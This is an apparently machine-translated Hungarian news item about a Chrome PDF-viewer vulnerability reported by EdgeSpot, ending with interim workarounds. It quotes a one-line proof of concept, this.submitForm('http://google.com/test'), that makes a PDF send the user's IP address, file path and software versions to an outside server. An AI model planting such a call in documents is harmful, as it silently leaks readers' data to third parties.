Az észlelési szolgáltatás kiaknázása Az EdgeSpot egy érdekes, nulla napos biztonsági rést fedez fel a PDF-dokumentumokat kihasználva. A biztonsági rés lehetővé teszi a támadók számára, hogy érzékeny adatokat gyűjtsenek a Chrome-ban megnyitott rosszindulatú PDF-dokumentumokkal.

Amint az áldozat megnyitja a megfelelő PDF fájlokat a Google Chrome-ban, egy rosszindulatú program a háttérben dolgozik, felhasználói adatok gyűjtésével.

Az adatokat ezután továbbítják a távoli szerverhez, amelyet a hackerek irányítanak. Kíváncsi lehet, hogy milyen adatokat szednek a támadók, és a következő adatokat célozzák meg a számítógépen:

• IP-cím
• A PDF fájl teljes elérési útja a rendszeren
• OS és Chrome verziók

Óvakodj a rosszindulatú szoftverekkel sújtott PDF fájlokról

Meglepődhet, ha tudomásul veszi, hogy semmi sem történik, ha az Adobe Reader programot használja a PDF fájlok megnyitásához. Ezenkívül a HTTP POST kéréseket használják az adatok továbbítására a távoli szerverekre felhasználói beavatkozás nélkül.

A szakértők észrevették, hogy a readnotifycom vagy a burpcollaboratornet két domain egyike kapja az adatokat.

A támadás intenzitását elképzelheti úgy, hogy figyelembe veszi azt a tényt, hogy a legtöbb víruskereső szoftver nem képes felismerni az EdgeSpot által észlelt mintákat.

A szakértők felfedik, hogy a támadók az „this.submitForm ()” PDF Javascript API-t használják a felhasználók érzékeny információk gyűjtésére.

Kipróbáltuk egy minimális PoC-vel, egy olyan egyszerű API-hívással, mint a “this.submitForm ('http://google.com/test')” a Google Chrome elküldi a személyes adatokat a google.com webhelyre.

A szakértők valóban kiderítették, hogy ezt a Chrome-hibát két különálló, rosszindulatú PDF-fájlok halmozták ki. Mindkettőt 2017 októberében és 2018 szeptemberében terjesztették forgalomba.

Nevezetesen, az összegyűjtött adatokat a támadók felhasználhatják a jövőbeli támadások finomhangolására. A jelentések azt sugallják, hogy az első fájlkészlet a ReadNotify PDF-követő szolgáltatásával készült össze.

A felhasználók felhasználhatják a szolgáltatást a felhasználói nézetek nyomon követésére. Az EdgeSpot még nem osztott meg részleteket a PDF-fájlok második csoportjának jellegéről.

Hogyan lehet védeni

Az EdgeSpot exploit észlelési szolgáltatása figyelmeztette a felhasználókat, a Chrome felhasználóit a lehetséges kockázatokra, mivel a javítás várhatóan nem várható a közeljövőben.

Az EdgeSpot tavaly számolt be a Google-nak a sebezhetőségről, és a vállalat április végén megígérte, hogy kiad egy javítást. H

De megfontolhatja egy ideiglenes megoldás alkalmazását a probléma megoldásához, ha helyben megtekinti a kapott PDF-dokumentumokat egy alternatív PDF-olvasó alkalmazás segítségével.

Alternatív megoldásként a PDF-dokumentumokat a Chrome-ban is megnyithatja, ha leválasztja a rendszereit az internetről. Időközben megvárhatja a Chrome 74 frissítést, amely várhatóan április 23-án válik elérhetővé.